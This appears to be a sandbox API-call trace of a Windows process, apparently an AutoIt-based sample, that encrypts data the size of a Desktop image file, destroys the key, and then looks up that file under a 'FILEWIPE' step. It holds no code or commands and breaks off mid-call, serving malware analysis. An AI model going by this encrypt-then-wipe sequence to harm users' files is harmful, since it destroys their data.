PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0032.188] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.188] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0032.188] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.188] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.188] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.188] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0032.189] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.189] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.189] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1482c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x14830) returned 1 [0032.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.189] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.189] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.190] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.190] CharLowerBuffW (in: lpsz="byte[84017]", cchLength=0xb | out: lpsz="byte[84017]") returned 0xb [0032.190] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.191] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.191] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.191] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.191] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0032.191] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.191] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b9020*, pdwDataLen=0x6ae220*=0x1482c, dwBufLen=0x14830 | out: pbData=0x8b9020*, pdwDataLen=0x6ae220*=0x14830) returned 1 [0032.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0032.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.192] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.192] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.192] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.192] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.192] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.192] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.192] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0032.193] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.193] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0032.193] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.193] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.193] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.193] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.193] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0032.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.198] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.198] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.203] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.203] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.203] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.203] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.203] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.203] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0032.203] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.203] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0032.203] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.203] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.203] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0032.203] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.204] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0032.204] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.204] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0032.204] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.204] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.204] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.204] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.204] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.204] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0032.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0032.205] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0032.223] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.223] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.223] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0032.223] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.223] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.223] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.223] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0032.337] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0032.337] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.338] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.338] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0032.338] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.338] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0032.338] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0032.338] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0032.338] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.338] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0032.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.338] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.339] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.341] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.341] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0032.341] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0032.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.341] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.341] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\xhMPO 5df6plfz4yAr.bmp", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99aa2630, ftCreationTime.dwHighDateTime=0x1d5b6d2, ftLastAccessTime.dwLowDateTime=0x3c201e00, ftLastAccessTime.dwHighDateTime=0x1d5c5e8, ftLastWriteTime.dwLowDateTime=0x3c201e00, ftLastWriteTime.dwHighDateTime=0x1d5c5e8, nFileSizeHigh=0x0, nFileSizeLow=0x1482c, dwReserved0=0x0, dwReserved1=0x777648, cFileName="xhMPO 5df6plfz4yAr.bmp", cAlternateFileName="XHMPO5~1.BMP")) returned 0x7c2240 [0032.342] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c10 | out: hHeap=0x770000) returned 1 [0032.342] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0032.342] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.342] CharLowerBuffW (in: 